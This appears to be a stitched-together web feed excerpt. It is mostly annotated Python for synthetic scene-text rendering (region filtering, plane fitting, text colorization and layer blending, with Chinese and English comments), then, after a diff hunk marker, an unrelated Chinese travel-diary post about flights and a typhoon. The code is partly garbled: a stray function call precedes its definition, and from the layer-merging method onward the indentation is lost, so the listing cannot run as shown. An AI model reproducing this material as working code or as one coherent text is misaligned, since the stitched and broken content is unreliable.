            # box = np.array(cv2.cv.BoxPoints(rect))
            # its four corner points:
            box = np.array(cv2.boxPoints(rect))
            # rectified width w, height h and rotation matrix rot:
            h, w, rot = TextRegions.get_hw(box, return_rot=True)
            # keep the region only if all of the following hold:
            #   h > minHeight and w > minWidth;
            #   minAspect < w/h < maxAspect;
            #   the fill-ratio test (note: as written this evaluates
            #   (area/w)*h, while the pArea comment above suggests
            #   area/(w*h) was intended)
            f = (h > TextRegions.minHeight
                 and w > TextRegions.minWidth
                 and TextRegions.minAspect < w/h < TextRegions.maxAspect
                 and area[idx]/w*h > TextRegions.pArea)
            filt.append(f)
            # remember the rotation matrix:
            R.append(rot)

        # filter bad regions:
        filt = np.array(filt)
        area = area[filt]
        R = [R[i] for i in range(len(R)) if filt[i]]

        # sort the regions based on areas:
        aidx = np.argsort(-area)
        good = good[filt][aidx]
        R = [R[i] for i in aidx]
        # return labels, rotations and areas of the surviving regions:
        filter_info = {'label': good, 'rot': R, 'area': area[aidx]}
        return filter_info

    @staticmethod
    def sample_grid_neighbours(mask, nsample, step=3):
        """
        Given a HxW binary mask, sample 4 neighbours on the grid,
        in the cardinal directions, STEP pixels away.
        :mask: H x W binary mask
        :nsample: number of samples
        :step: sampling step
        """
        if 2*step >= min(mask.shape[:2]):
            return  # None
        # coordinates of the non-zero mask pixels:
        y_m, x_m = np.where(mask)
        # mask_idx stores a linear index for every non-zero pixel:
        mask_idx = np.zeros_like(mask, 'int32')
        for i in range(len(y_m)):
            mask_idx[y_m[i], x_m[i]] = i
        # shift the mask by 2*step in the +/-x and +/-y directions to find
        # the neighbour pixels in the four cardinal directions:
        xp, xn = np.zeros_like(mask), np.zeros_like(mask)
        yp, yn = np.zeros_like(mask), np.zeros_like(mask)
        xp[:, :-2*step] = mask[:, 2*step:]
        xn[:, 2*step:] = mask[:, :-2*step]
        yp[:-2*step, :] = mask[2*step:, :]
        yn[2*step:, :] = mask[:-2*step, :]
        # valid pixels have neighbours in all four directions:
        valid = mask & xp & xn & yp & yn

        # coordinates of the valid pixels:
        ys, xs = np.where(valid)
        N = len(ys)
        if N == 0:  # no valid pixels in mask:
            return  # None
        # sample nsample pixels (at most N):
        nsample = min(nsample, N)
        # choose nsample distinct indices:
        idx = np.random.choice(N, nsample, replace=False)
        # generate neighborhood matrix:
        # (1+4)x2xNsample (2 for y,x)
        xs, ys = xs[idx], ys[idx]
        s = step
        X = np.transpose(np.c_[xs, xs+s, xs+s, xs-s, xs-s][:, :, None], (1, 2, 0))
        Y = np.transpose(np.c_[ys, ys+s, ys-s, ys+s, ys-s][:, :, None], (1, 2, 0))
        sample_idx = np.concatenate([Y, X], axis=1)
        # convert the neighbourhood coordinates into linear mask indices,
        # yielding a 5 x Nsample matrix:
        mask_nn_idx = np.zeros((5, sample_idx.shape[-1]), 'int32')
        for i in range(sample_idx.shape[-1]):
            mask_nn_idx[:, i] = mask_idx[sample_idx[:, :, i][:, 0], sample_idx[:, :, i][:, 1]]
        return mask_nn_idx

    @staticmethod
    def filter_depth(xyz, seg, regions):
        """
        Depth-filter each region, given the point cloud, the segmentation
        and the region info.
        :xyz: point-cloud coordinates
        :seg: segmentation
        :regions: region info
        """
        # plane_info collects the planes that pass the tests:
        plane_info = {'label': [],
                      'coeff': [],
                      'support': [],
                      'rot': [],
                      'area': []}
        for idx, l in enumerate(regions['label']):
            # binary mask for region label l:
            mask = seg == l
            # sample grid-neighbour pixel indices used for RANSAC plane fitting:
            pt_sample = TextRegions.sample_grid_neighbours(mask, TextRegions.ransac_fit_trials, step=3)
            # skip the region if there are not enough points:
            if pt_sample is None:
                continue  # not enough points for RANSAC
            # get-depths
            # 3D points belonging to this region:
            pt = xyz[mask]
            # su.isplanar runs the plane detection on pt with the sampled
            # point sets and the thresholds above; if a plane is found, the
            # returned plane_model holds the coefficients, inlier support, etc.
            plane_model = su.isplanar(pt, pt_sample,
                                      TextRegions.dist_thresh,
                                      TextRegions.num_inlier,
                                      TextRegions.min_z_projection)
            # store the plane if one was found and its normal is not too
            # orthogonal to the viewing direction:
            if plane_model is not None:
                plane_coeff = plane_model[0]
                if np.abs(plane_coeff[2]) > TextRegions.min_z_projection:
                    plane_info['label'].append(l)
                    plane_info['coeff'].append(plane_model[0])
                    plane_info['support'].append(plane_model[1])
                    plane_info['rot'].append(regions['rot'][idx])
                    plane_info['area'].append(regions['area'][idx])

        return plane_info

    @staticmethod
    def get_regions(xyz, seg, area, label):
        """
        Get the text regions from the point cloud, the segmentation, the
        region areas and the region labels.
        """
        # first pass: geometric filtering of the segmentation:
        regions = TextRegions.filter(seg, area, label)
        # fit plane to text-regions:
        regions = TextRegions.filter_depth(xyz, seg, regions)
        return regions
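A toy check of the geometric filter above: fit a minAreaRect to a synthetic region mask and apply the same width/height/aspect/fill tests (thresholds copied from the class constants):

import numpy as np
import cv2

mask = np.zeros((100, 100), np.uint8)
mask[20:60, 10:90] = 1  # a 40 x 80 rectangular "region"
xs, ys = np.where(mask)
coords = np.c_[xs, ys].astype('float32')
(cx, cy), (w, h), angle = cv2.minAreaRect(coords)
area = float(mask.sum())
ok = (min(w, h) > 30 and 0.3 < w/h < 7 and area/(w*h) > 0.60)
print((w, h), round(area/(w*h), 2), ok)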

    colorize3_poisson.py

    import cv2 as cv
    import numpy as np
    import matplotlib.pyplot as plt
    import scipy.interpolate as si
    import scipy.ndimage as scim
    import scipy.ndimage.interpolation as sii
    import os
    import os.path as osp
    #import cPickle as cp
    import _pickle as cp
    #import Image
    from PIL import Image
    from poisson_reconstruct import blit_images
    import pickle

    sample_weighted()

def sample_weighted(p_dict):
    """
    Sample from the probability distribution described by the dict p_dict,
    whose keys are the possible outcomes and whose values are their
    probabilities. (list() wrappers added: in Python 3, dict.keys() and
    dict.values() views cannot be indexed or passed to np.random.choice
    directly.)
    """
    ps = list(p_dict.keys())
    return ps[np.random.choice(len(ps), p=list(p_dict.values()))]
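Example usage (the dict maps outcomes to probabilities):

p = {'none': 0.85, 'shadow': 0.15}
print(sample_weighted(p))  # 'none' roughly 85% of the time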

    class Layer()

class Layer(object):

    def __init__(self, alpha, color):

        # alpha for the whole image:
        # alpha must be a 2D matrix; remember its shape as [n, m]:
        assert alpha.ndim == 2
        self.alpha = alpha
        [n, m] = alpha.shape[:2]
        # convert color to a uint8 array:
        color = np.atleast_1d(np.array(color)).astype('uint8')
        # color for the image:
        # build the color matrix depending on whether color describes a
        # constant color, a grayscale image or an RGB image:
        if color.ndim == 1:  # constant color for whole layer
            ncol = color.size
            if ncol == 1:  # grayscale layer
                self.color = color * np.ones((n, m, 3), 'uint8')
            if ncol == 3:
                self.color = np.ones((n, m, 3), 'uint8') * color[None, None, :]
        elif color.ndim == 2:  # grayscale image: replicate to 3 channels
            self.color = np.repeat(color[:, :, None], repeats=3, axis=2).copy().astype('uint8')
        elif color.ndim == 3:  # rgb image: store as-is
            self.color = color.copy().astype('uint8')
        else:  # anything else is an error
            print(color.shape)
            raise Exception("color datatype not understood")
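For instance, a fully opaque 10×10 red layer built from a constant color:

import numpy as np

l = Layer(alpha=255*np.ones((10, 10), np.uint8), color=(255, 0, 0))
print(l.alpha.shape, l.color.shape)  # (10, 10) (10, 10, 3)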

    class FontColor()

class FontColor(object):

    def __init__(self, col_file):
        """
        Build a FontColor object from the color file col_file.
        """
        with open(col_file, 'rb') as f:
            # self.colorsRGB = cp.load(f)
            # unpickle the color data with latin1 encoding (needed for
            # pickles written by Python 2):
            u = pickle._Unpickler(f)
            u.encoding = 'latin1'
            p = u.load()
            # store the color data and the number of color entries:
            self.colorsRGB = p
            self.ncol = self.colorsRGB.shape[0]

        # convert color-means from RGB to LAB for better nearest neighbour
        # computations:
        self.colorsLAB = np.r_[self.colorsRGB[:, 0:3], self.colorsRGB[:, 6:9]].astype('uint8')
        self.colorsLAB = np.squeeze(cv.cvtColor(self.colorsLAB[None, :, :], cv.COLOR_RGB2Lab))

    def sample_normal(self, col_mean, col_std):
        """
        sample from a normal distribution centered around COL_MEAN
        with standard deviation = COL_STD.
        """
        col_sample = col_mean + col_std * np.random.randn()
        # clip to [0, 255] and convert to uint8:
        return np.clip(col_sample, 0, 255).astype('uint8')

    def sample_from_data(self, bg_mat):
        """
        bg_mat : this is a nxmx3 RGB image.

        returns a tuple : (RGB_foreground, RGB_background)
        each of these is a 3-vector.
        """
        # keep a copy of the input background image:
        bg_orig = bg_mat.copy()
        # convert to LAB and flatten to one pixel per row:
        bg_mat = cv.cvtColor(bg_mat, cv.COLOR_RGB2Lab)
        bg_mat = np.reshape(bg_mat, (np.prod(bg_mat.shape[:2]), 3))
        # mean color of the background:
        bg_mean = np.mean(bg_mat, axis=0)

        # Euclidean distance of each color entry to the background mean:
        norms = np.linalg.norm(self.colorsLAB - bg_mean[None, :], axis=1)
        # choose a random color amongst the top 3 closest matches:
        # nn = np.random.choice(np.argsort(norms)[:3])
        # index of the closest color entry:
        nn = np.argmin(norms)

        # nearest neighbour color:
        data_col = self.colorsRGB[np.mod(nn, self.ncol), :]

        # sample the foreground color from the first half of the entry...
        col1 = self.sample_normal(data_col[:3], data_col[3:6])
        # ...and the background color from the second half:
        col2 = self.sample_normal(data_col[6:9], data_col[9:12])

        # order the pair so the second color is close to the input background:
        if nn < self.ncol:
            return (col2, col1)  # background-like color first, then foreground
        else:
            # need to swap to make the second color close to the input background color
            return (col1, col2)

    def mean_color(self, arr):
        """
        Convert the input image to HSV, average over all pixels, and return
        the mean color converted back to RGB.
        """
        col = cv.cvtColor(arr, cv.COLOR_RGB2HSV)
        # flatten to one pixel per row:
        col = np.reshape(col, (np.prod(col.shape[:2]), 3))
        # per-channel mean as uint8:
        col = np.mean(col, axis=0).astype('uint8')
        # back to RGB, squeezed to a 3-vector:
        return np.squeeze(cv.cvtColor(col[None, None, :], cv.COLOR_HSV2RGB))

    def invert(self, rgb):
        """
        Shift all channels by 127 (an approximate inversion, relying on
        uint8 wrap-around rather than computing 255 - rgb).
        """
        rgb = 127 + rgb
        return rgb

    def complement(self, rgb_color):
        """
        return a color which is complementary to the RGB_COLOR.
        """
        # convert to HSV, squeezed to a 3-vector:
        col_hsv = np.squeeze(cv.cvtColor(rgb_color[None, None, :], cv.COLOR_RGB2HSV))
        # shift the hue by 128 (relies on uint8 wrap-around):
        col_hsv[0] = col_hsv[0] + 128  # uint8 mods to 255
        # back to RGB:
        col_comp = np.squeeze(cv.cvtColor(col_hsv[None, None, :], cv.COLOR_HSV2RGB))
        return col_comp

    def triangle_color(self, col1, col2):
        """
        Returns a color which is "opposite" to both col1 and col2.
        """
        # convert both inputs to HSV 3-vectors:
        col1, col2 = np.array(col1), np.array(col2)
        col1 = np.squeeze(cv.cvtColor(col1[None, None, :], cv.COLOR_RGB2HSV))
        col2 = np.squeeze(cv.cvtColor(col2[None, None, :], cv.COLOR_RGB2HSV))
        # hues of the two colors:
        h1, h2 = col1[0], col2[0]
        # make sure h1 <= h2:
        if h2 < h1:
            h1, h2 = h2, h1  # swap
        # hue difference:
        dh = h2 - h1
        # if the hues are close together, jump to the far side of the hue circle:
        if dh < 127:
            dh = 255 - dh
        # place the result half-way between the two hues:
        col1[0] = h1 + dh/2
        # convert back to RGB and return:
        return np.squeeze(cv.cvtColor(col1[None, None, :], cv.COLOR_HSV2RGB))

    def change_value(self, col_rgb, v_std=50):
        """
        Randomly change the value (brightness) of the RGB color col_rgb.
        """
        # convert to HSV:
        col = np.squeeze(cv.cvtColor(col_rgb[None, None, :], cv.COLOR_RGB2HSV))
        # current value channel:
        x = col[2]
        # 50 evenly spaced candidate values in [0, 1]:
        vs = np.linspace(0, 1)
        # weight each candidate by its distance from x/255 (values far from
        # the current one are more likely), then normalize to sum to 1:
        ps = np.abs(vs - x/255.0)
        ps /= np.sum(ps)
        # sample a value, add a small Gaussian jitter, clip to [0, 1]:
        v_rand = np.clip(np.random.choice(vs, p=ps) + 0.1*np.random.randn(), 0, 1)
        # write the new value channel and convert back to RGB:
        col[2] = 255*v_rand
        return np.squeeze(cv.cvtColor(col[None, None, :], cv.COLOR_HSV2RGB))
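One detail worth noting about complement(): OpenCV stores the hue of an 8-bit HSV image in [0, 180), so the +128 relies on uint8 wrap-around modulo 256 rather than 180 - which is what the "uint8 mods to 255" comment hints at. A standalone check of that arithmetic:

import numpy as np
import cv2 as cv

rgb = np.array([200, 60, 60], np.uint8)  # a reddish color
hsv = np.squeeze(cv.cvtColor(rgb[None, None, :], cv.COLOR_RGB2HSV))
hsv[0] = hsv[0] + 128                    # wraps modulo 256 on uint8
print(hsv[0], np.squeeze(cv.cvtColor(hsv[None, None, :], cv.COLOR_HSV2RGB)))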

    class Colorize()

class Colorize(object):

    def __init__(self, model_dir='data'):  # , im_path):
        # # get a list of background-images:
        # imlist = [osp.join(im_path,f) for f in os.listdir(im_path)]
        # self.bg_list = [p for p in imlist if osp.isfile(p)]

        # build the FontColor object from the color file
        # <model_dir>/models/colors_new.cp:
        self.font_color = FontColor(col_file=osp.join(model_dir, 'models/colors_new.cp'))

        # probabilities of different text-effects:
        self.p_bevel = 0.05         # add bevel effect to text
        self.p_outline = 0.05       # just keep the outline of the text
        self.p_drop_shadow = 0.15   # add a drop shadow
        self.p_border = 0.15        # add a border around the text
        self.p_displacement = 0.30  # add background-based bump-mapping
        self.p_texture = 0.0        # use an image for coloring text

    def drop_shadow(self, alpha, theta, shift, size, op=0.80):
        """
        Add a drop shadow to the input alpha layer; the effect is controlled
        by theta, shift, size and op.
        alpha : alpha layer whose shadow need to be cast
        theta : [0,2pi] -- the shadow direction
        shift : shift in pixels of the shadow
        size : size of the GaussianBlur filter
        op : opacity of the shadow (multiplying factor)

        @return : alpha of the shadow layer
        (it is assumed that the color is black/white)
        """
        if size % 2 == 0:  # the Gaussian kernel size must be odd
            size -= 1
        size = max(1, size)
        # Gaussian-blur the alpha layer with a (size, size) kernel:
        shadow = cv.GaussianBlur(alpha, (size, size), 0)
        # x/y offsets of the shadow from the angle theta and distance shift:
        [dx, dy] = shift * np.array([-np.sin(theta), np.cos(theta)])
        # shift the blurred layer (constant 0 border fill) and scale it by
        # the opacity factor op:
        shadow = op*sii.shift(shadow, shift=[dx, dy], mode='constant', cval=0)
        return shadow.astype('uint8')

    def border(self, alpha, size, kernel_type='RECT'):
        """
        alpha : alpha layer of the text
        size : size of the kernel
        kernel_type : one of [rect,ellipse,cross]

        @return : alpha layer of the border (color to be added externally).
        """
        # map kernel_type to the corresponding OpenCV morphology constant:
        kdict = {'RECT': cv.MORPH_RECT, 'ELLIPSE': cv.MORPH_ELLIPSE,
                 'CROSS': cv.MORPH_CROSS}
        # structuring element of the requested shape and (size, size) extent:
        kernel = cv.getStructuringElement(kdict[kernel_type], (size, size))
        # dilate the alpha layer once so the text grows outwards; subtracting
        # alpha (commented out) would keep only the outline:
        border = cv.dilate(alpha, kernel, iterations=1)  # - alpha
        return border

    def blend(self, cf, cb, mode='normal'):
        """
        Only returns the foreground color -- the actual blend modes were
        apparently never implemented (or were left as a stub).
        """
        return cf

    def merge_two(self, fore, back, blend_type=None):
        """
        merge two FOREground and BACKground layers.
        ref: https://en.wikipedia.org/wiki/Alpha_compositing
        ref: Chapter 7 (pg. 440 and pg. 444):
        http://partners.adobe.com/public/developer/en/pdf/PDFReference.pdf
        """
        # foreground and background opacities as floats in [0, 1]:
        a_f = fore.alpha/255.0
        a_b = back.alpha/255.0
        # foreground and background color channels:
        c_f = fore.color
        c_b = back.color
        # resulting alpha of the composite:
        a_r = a_f + a_b - a_f*a_b
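        # note: a_f + a_b - a_f*a_b == a_f + a_b*(1 - a_f), the standard
        # "A over B" result from the alpha-compositing references above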
    if blend_type != None:
    # 使用之前提到的 blend() 方法将前景和背景的颜色进行合成,得到混合后的颜色
    c_blend = self.blend(c_f, c_b, blend_type)
    # 以混合后的颜色为基础,按照 Alpha 合成公式计算新的合成后的图像的颜色值
    c_r = ( ((1-a_f)*a_b)[:,:,None] * c_b
    + ((1-a_b)*a_f)[:,:,None] * c_f
    + (a_f*a_b)[:,:,None] * c_blend )
    else:
    # c_r 的计算只根据前景和背景的颜色以及各自的不透明度进行合成
    c_r = ( ((1-a_f)*a_b)[:,:,None] * c_b
    + a_f[:,:,None]*c_f )
    # 返回一个新的图层对象,其中包含合成后的图像的 alpha 和颜色通道值
    return Layer((255*a_r).astype('uint8'), c_r.astype('uint8'))

    def merge_down(self, layers, blends=None):
    """
    将多个图层逐层合并成单个图层
    layers : [l1,l2,...ln] : a list of LAYER objects.
    l1 is on the top, ln is the bottom-most layer.
    blend : the type of blend to use. Should be n-1.
    use None for plain alpha blending.
    Note : (1) it assumes that all the layers are of the SAME SIZE.
    @return : a single LAYER type object representing the merged-down image
    """
    nlayers = len(layers) # 获取图层数量
    if nlayers > 1: # 检查是否有多个图层需要合并
    [n,m] = layers[0].alpha.shape[:2] # 获取第一个图层的尺寸
    out_layer = layers[-1] # 初始化输出图层为最底层的图层
    # 从倒数第二个图层开始循环遍历,直到最顶层的图层
    for i in range(-2,-nlayers-1,-1):
    blend=None
    if blends is not None:
    blend = blends[i+1]
    out_layer = self.merge_two(fore=layers[i], back=out_layer,blend_type=blend)
    return out_layer
    else:
    return layers[0]

    def resize_im(self, im, osize):
    # 将输入的图像调整为指定的大小
    return np.array(Image.fromarray(im).resize(osize[::-1], Image.BICUBIC))

    def occlude(self):
    """
    somehow add occlusion to text.
    这个方法 occlude() 是一个占位方法,还未实现其具体功能。

    根据注释中的描述,该方法的目的是向文本中添加遮挡效果。然而,在代码中该方法没有任何实现,只有一个空的 pass 语句。这意味着在当前的代码实现中,该方法没有具体的功能。

    如果你希望实现该方法,你可以根据具体需求和设计思路,编写代码来实现添加遮挡效果的逻辑。例如,可以使用图像处理技术在文本区域上添加遮挡元素,或者通过修改文本的视觉特征来模拟遮挡效果。具体的实现方式取决于你的需求和想要实现的效果。
    """
    pass

    def color_border(self, col_text, col_bg):
    """
    用于确定边框的颜色的选择逻辑
    Decide on a color for the border:
    - could be the same as text-color but lower/higher 'VALUE' component. 边框颜色与文本颜色相同,但是 'VALUE' 分量较低或较高
    - could be the same as bg-color but lower/higher 'VALUE'. 边框颜色与背景颜色相同,但是 'VALUE' 分量较低或较高
    - could be 'mid-way' color b/w text & bg colors. 边框颜色为文本颜色和背景颜色之间的中间颜色。
    """
    # 随机选择一个数字,范围是 0 到 2,用于决定使用哪种方式选择边框颜色
    choice = np.random.choice(3)
    # 将输入的文本颜色 col_text 转换为 HSV 格式,以便于处理颜色的亮度等特征
    col_text = cv.cvtColor(col_text, cv.COLOR_RGB2HSV)
    # 将 col_text 变形为一维数组,并计算其均值,得到颜色的平均值
    col_text = np.reshape(col_text, (np.prod(col_text.shape[:2]),3))
    col_text = np.mean(col_text,axis=0).astype('uint8')
    # 通过线性插值,定义了一个从 0 到 1 的值序列,用于生成随机样本
    vs = np.linspace(0,1)
    def get_sample(x):
    """
    通过计算与目标值 x/255.0 的差距,选择一个随机样本,并在其上加入一定的随机扰动。返回取样结果乘以 255,得到一个颜色分量值。
    """
    ps = np.abs(vs - x/255.0)
    ps /= np.sum(ps)
    v_rand = np.clip(np.random.choice(vs,p=ps) + 0.1*np.random.randn(),0,1)
    return 255*v_rand

    # first choose a color, then inc/dec its VALUE:
    # 根据选择的方式进行不同的处理
    if choice==0:
    # increase/decrease saturation:
    # 增加或减少饱和度
    col_text[0] = get_sample(col_text[0]) # saturation
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))
    elif choice==1:
    # get the complementary color to text:
    # 获取文本颜色的互补色
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))
    col_text = self.font_color.complement(col_text)
    else:
    # choose a mid-way color:
    # 选择文本颜色和背景颜色的中间颜色
    col_bg = cv.cvtColor(col_bg, cv.COLOR_RGB2HSV)
    col_bg = np.reshape(col_bg, (np.prod(col_bg.shape[:2]),3))
    col_bg = np.mean(col_bg,axis=0).astype('uint8')
    col_bg = np.squeeze(cv.cvtColor(col_bg[None,None,:],cv.COLOR_HSV2RGB))
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))
    col_text = self.font_color.triangle_color(col_text,col_bg)

    # now change the VALUE channel:
    # 将处理后的颜色转换为 HSV 格式,并修改亮度通道的值。
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_RGB2HSV))
    col_text[2] = get_sample(col_text[2]) # value
    # 最后,将处理后的颜色转换为 RGB 格式,并返回结果
    return np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))

    def color_text(self, text_arr, h, bg_arr):
    """
    用于确定文本的颜色。具体而言,该方法采用以下几种方式之一来选择文本的颜色
    Decide on a color for the text:
    - could be some other random image. 从其他随机图像中选择一个颜色作为文本的颜色
    - could be a color based on the background. 根据背景选择一个颜色
    this color is sampled from a dictionary built
    from text-word images' colors. The VALUE channel
    is randomized.
    这个颜色是从建立在文本单词图像颜色上的字典中进行采样的。其中,颜色的亮度通道 (VALUE) 是随机化的

    H : minimum height of a character
    """
    # 定义变量,用于存储背景色和文本颜色
    bg_col,fg_col,i = 0,0,0
    # 从文本单词图像颜色构建的字典中采样一个颜色作为文本颜色,并将结果分别赋值给 fg_col 和 bg_col
    fg_col,bg_col = self.font_color.sample_from_data(bg_arr)
    # 创建一个 Layer 对象,将 text_arr 作为透明度 (alpha) 通道,将 fg_col 作为颜色 (color) 通道,并返回该对象以及 fg_col 和 bg_col
    return Layer(alpha=text_arr, color=fg_col), fg_col, bg_col


    def process(self, text_arr, bg_arr, min_h):
        """
        Blend the text layer onto the background image.

        text_arr : one alpha mask : nxm, uint8
        bg_arr   : background image : nxmx3, uint8
        min_h    : height of the smallest character (px)

        return text_arr blit onto bg_arr.
        """
        # decide on a color for the text:
        l_text, fg_col, bg_col = self.color_text(text_arr, min_h, bg_arr)
        # build a fully opaque layer filled with the mean background color:
        bg_col = np.mean(np.mean(bg_arr, axis=0), axis=0)
        l_bg = Layer(alpha=255 * np.ones_like(text_arr, 'uint8'), color=bg_col)
        # scale the text alpha by a randomized weight, clipped to [0.72, 1.0]:
        l_text.alpha = l_text.alpha * np.clip(0.88 + 0.1 * np.random.randn(), 0.72, 1.0)
        layers = [l_text]
        blends = []

        # add border:
        if np.random.rand() < self.p_border:
            # border size grows with the minimum character height min_h:
            if min_h <= 15:
                bsz = 1
            elif 15 < min_h < 30:
                bsz = 3
            else:
                bsz = 5
            border_a = self.border(l_text.alpha, size=bsz)
            # border layer: alpha from the dilated text mask, color chosen
            # from the text and background colors by color_border():
            l_border = Layer(border_a, self.color_border(l_text.color, l_bg.color))
            layers.append(l_border)
            blends.append('normal')

        # add shadow (with probability p_drop_shadow):
        if np.random.rand() < self.p_drop_shadow:
            # shadow gaussian size, again based on min_h:
            if min_h <= 15:
                bsz = 1
            elif 15 < min_h < 30:
                bsz = 3
            else:
                bsz = 5

            # shadow angle, randomly chosen:
            theta = np.pi / 4 * np.random.choice([1, 3, 5, 7]) + 0.5 * np.random.randn()

            # shadow shift, based on min_h:
            if min_h <= 15:
                shift = 2
            elif 15 < min_h < 30:
                shift = 7 + np.random.randn()
            else:
                shift = 15 + 3 * np.random.randn()

            # shadow opacity:
            op = 0.50 + 0.1 * np.random.randn()
            # shadow layer: blurred/shifted copy of the text alpha, color 0 (black):
            shadow = self.drop_shadow(l_text.alpha, theta, shift, 3 * bsz, op)
            l_shadow = Layer(shadow, 0)
            layers.append(l_shadow)
            blends.append('normal')

        # append an opaque layer filled with the mean background color:
        l_bg = Layer(alpha=255 * np.ones_like(text_arr, 'uint8'), color=bg_col)
        layers.append(l_bg)
        blends.append('normal')
        # merge all layers into one:
        l_normal = self.merge_down(layers, blends)
        # now do poisson image editing against the real background:
        l_bg = Layer(alpha=255 * np.ones_like(text_arr, 'uint8'), color=bg_arr)
        l_out = blit_images(l_normal.color, l_bg.color.copy())

        # plt.subplot(1,3,1)
        # plt.imshow(l_normal.color)
        # plt.subplot(1,3,2)
        # plt.imshow(l_bg.color)
        # plt.subplot(1,3,3)
        # plt.imshow(l_out)
        # plt.show()

        if l_out is None:
            # poisson reconstruction produced imperceptible text; in this
            # case, swap in the real-background layer and do a normal blend:
            layers[-1] = l_bg
            return self.merge_down(layers, blends).color

        return l_out


    def check_perceptible(self, txt_mask, bg, txt_bg):
        """
        --- DEPRECATED; USE GRADIENT CHECKING IN POISSON-RECONSTRUCT INSTEAD ---

        Checks if the text is still visible after merging with the background.

        txt_mask (hxw)  : binary image of text -- 255 where text is present,
                          0 elsewhere
        bg (hxwx3)      : original background image WITHOUT any text.
        txt_bg (hxwx3)  : image with text.
        """
        bgo, txto = bg.copy(), txt_bg.copy()
        txt_mask = txt_mask.astype('bool')
        bg = cv.cvtColor(bg.copy(), cv.COLOR_RGB2Lab)
        txt_bg = cv.cvtColor(txt_bg.copy(), cv.COLOR_RGB2Lab)
        bg_px = bg[txt_mask, :]
        txt_px = txt_bg[txt_mask, :]
        bg_px[:, 0] *= 100.0 / 255.0  # rescale the L channel
        txt_px[:, 0] *= 100.0 / 255.0

        diff = np.linalg.norm(bg_px - txt_px, ord=None, axis=1)
        diff = np.percentile(diff, [10, 30, 50, 70, 90])
        print("color diff percentile :", diff)
        return diff, (bgo, txto)

    def color(self, bg_arr, text_arr, hs, place_order=None, pad=20):
        """
        Return the colorized text image.

        bg_arr      : background image (nxm or nxmx3, uint8).
        text_arr    : list of (n x m) numpy text alpha masks (uint8).
        hs          : list of minimum heights (scalar) of characters in each text-array.
        place_order : order in which to place the text masks (default: input order).
        pad         : padding (px) kept around each text patch.

        return : nxmx3 RGB colorized text-image.
        """
        # copy the input background image:
        bg_arr = bg_arr.copy()
        # promote grayscale / single-channel backgrounds to 3 channels:
        if bg_arr.ndim == 2 or bg_arr.shape[2] == 1:
            bg_arr = np.repeat(bg_arr[:, :, None], 3, 2)

        # get the canvas size:
        canvas_sz = np.array(bg_arr.shape[:2])

        # initialize the placement order:
        if place_order is None:
            place_order = np.array(range(len(text_arr)))

        rendered = []
        # process each text mask in reverse placement order:
        for i in place_order[::-1]:
            # get the "location" of the text in the image, i.e. the minimum
            # x and y coordinates of the text, and crop out the text patch:
            loc = np.where(text_arr[i])
            lx, ly = np.min(loc[0]), np.min(loc[1])
            mx, my = np.max(loc[0]), np.max(loc[1])
            l = np.array([lx, ly])
            m = np.array([mx, my]) - l + 1
            text_patch = text_arr[i][l[0]:l[0] + m[0], l[1]:l[1] + m[1]]

            # figure out padding:
            ext = canvas_sz - (l + m)
            num_pad = pad * np.ones(4, dtype='int32')
            num_pad[:2] = np.minimum(num_pad[:2], l)
            num_pad[2:] = np.minimum(num_pad[2:], ext)
            text_patch = np.pad(text_patch,
                                pad_width=((num_pad[0], num_pad[2]), (num_pad[1], num_pad[3])),
                                mode='constant')
            l -= num_pad[:2]

            w, h = text_patch.shape
            bg = bg_arr[l[0]:l[0] + w, l[1]:l[1] + h, :]

            # colorize the text patch against its local background:
            rdr0 = self.process(text_patch, bg, hs[i])
            rendered.append(rdr0)

            # paste the colorized patch back into the background image:
            bg_arr[l[0]:l[0] + w, l[1]:l[1] + h, :] = rdr0  # rendered[-1]

        # Note: in the original listing the `return bg_arr` was indented so
        # that it sat inside the for loop, making the loop run only once --
        # almost certainly an indentation mistake. The return belongs here,
        # after the loop:
        return bg_arr
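
上面有两个点容易单独拿出来把玩:get_sample 的"按距离加权"采样(倾向于取远离输入值的亮度,从而拉开对比度),以及 merge_down 对图层栈做的 normal 混合。下面是一个自包含的 NumPy 小示意(merge_down 的真实实现不在本段摘录里,这里的 composite 只是对标准 alpha 合成的假设):

import numpy as np

# 1) get_sample 式采样:取值概率正比于与 x/255 的距离,偏向远离 x
def get_sample_demo(x, n=50):
    vs = np.linspace(0, 1, n)
    ps = np.abs(vs - x / 255.0)
    ps /= ps.sum()
    v = np.clip(np.random.choice(vs, p=ps) + 0.1 * np.random.randn(), 0, 1)
    return 255 * v

print(get_sample_demo(128))  # 很少落在 128 附近

# 2) normal 混合:假设 merge_down 做的就是标准 alpha 合成
def composite(fg_color, fg_alpha, bg_color):
    a = (fg_alpha / 255.0)[..., None]
    return (a * fg_color + (1.0 - a) * bg_color).astype('uint8')

bg = np.full((32, 64, 3), 200, np.uint8)       # 浅色背景
alpha = np.zeros((32, 64), np.uint8)
alpha[10:22, 8:56] = 255                       # 伪造的文本掩码
out = composite(np.zeros_like(bg), alpha, bg)  # 黑色"文本"压到背景上
print(out[16, 30], out[0, 0])                  # [0 0 0] [200 200 200]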
    ]]>
    @@ -5212,7 +5212,7 @@ /posts/Diary-%E5%8F%88%E9%B9%AD%E4%BA%86%EF%BC%8C%E5%8F%88%E5%8F%88%E5%86%80%E4%BA%86/ - 前言
            

    ​ 暑假结束了!本着体验生活瞎折腾的目的,先从厦门玩两天再去学校嘻嘻嘻。

    正文

    8.10 购买机票

    jpg

    ​ 该买机票了。

    ​ 之前从福州飞石家庄觉得要经停,十分讨厌,于是试了试从厦门飞的路线。

    ​ 顺便再见见 LYY。

    ​ 本来想买 9.1 的票,结果结账的时候发现它涨价了,我不能接受!于是买了 9.3 的了,导师真好啊马上就同意了。喜提又摆烂两天!

    买了个周日的
    可以,那我就更有空了
    2 号不用上班

    8.15 酒店

    jpg

    ​ 刚好 LYY 也住机场附近,那我也订个机场附近的酒店。

    8.31 小插曲

    17:57 台风?

    这个台风太叼了,可能要宾馆蹲 2 天了
    湖雨辰全责
    湖雨霃
    还挺有文化的

    ​ 非常不幸地在旅程前遇到了台风……虽然说是冲广东去的但是闽南还是会暴雨。

    20:52 重买车票

